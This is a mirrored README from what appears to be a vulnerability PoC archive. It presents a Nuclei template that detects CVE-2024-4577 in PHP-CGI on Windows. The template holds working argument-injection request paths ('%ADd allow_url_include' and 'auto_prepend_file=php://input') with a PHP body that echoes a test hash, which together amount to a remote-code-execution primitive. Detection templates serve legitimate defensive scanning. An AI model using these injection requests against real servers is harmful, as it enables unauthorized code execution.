Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-4577 PoC — Argument Injection in PHP-CGI

Source
https://github.com/huseyinstif/CVE-2024-4577-Nuclei-Template
Associated Vulnerability
Title:Argument Injection in PHP-CGI (CVE-2024-4577)
Description:In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use "Best-Fit" behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.
Readme
# CVE-2024-4577 Nuclei Template

This repository contains a Nuclei template to detect the PHP CGI Argument Injection vulnerability identified as CVE-2024-4577.

## Template Details

```yaml
id: CVE-2024-4577

info:
  name: CVE-2024-4577 PHP CGI Argument Injection
  author: Hüseyin TINTAŞ
  severity: critical
  description: >
    CVE-2024-4577 PHP CGI Argument Injection Vulnerability.
    This template checks if the response contains "CVE_2024_4577_TEST" indicating a successful injection.
  tags: cve,cve2024,php,cgi,rce,cve2024-4577

http:
  - method: POST
    path:
      - "{{BaseURL}}/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/cgi-bin/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/php-cgi/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      - "{{BaseURL}}/index.test?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
      
    headers:
      User-Agent: "curl/8.3.0"
      Accept: "*/*"
      Content-Type: "application/x-www-form-urlencoded"
      Connection: "keep-alive"
    body: |
      <?php echo md5("CVE_2024_4577_TEST"); ?>
    matchers:
      - type: word
        part: body
        words:
          - "83946a388fdf6cd2707eed8550575a76"

```

## Usage

To use this template with Nuclei, save the template content into a file named `CVE-2024-4577.yaml` and run the following command:

```bash
nuclei -t CVE-2024-4577.yaml -u <target-url>
```
Replace `<target-url>` with the URL of the target you want to scan.

## Contact

For any inquiries or further information, you can reach out to me through:

- [LinkedIn](https://www.linkedin.com/in/huseyintintas/)
- [Twitter](https://twitter.com/1337stif)
File Snapshot

 [4.0K]  /data/pocs/74101abec4f4b6bd4bf5483c2dae150f22ec18a2
├── [1.3K]  CVE-2024-4577.yaml
└── [1.9K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →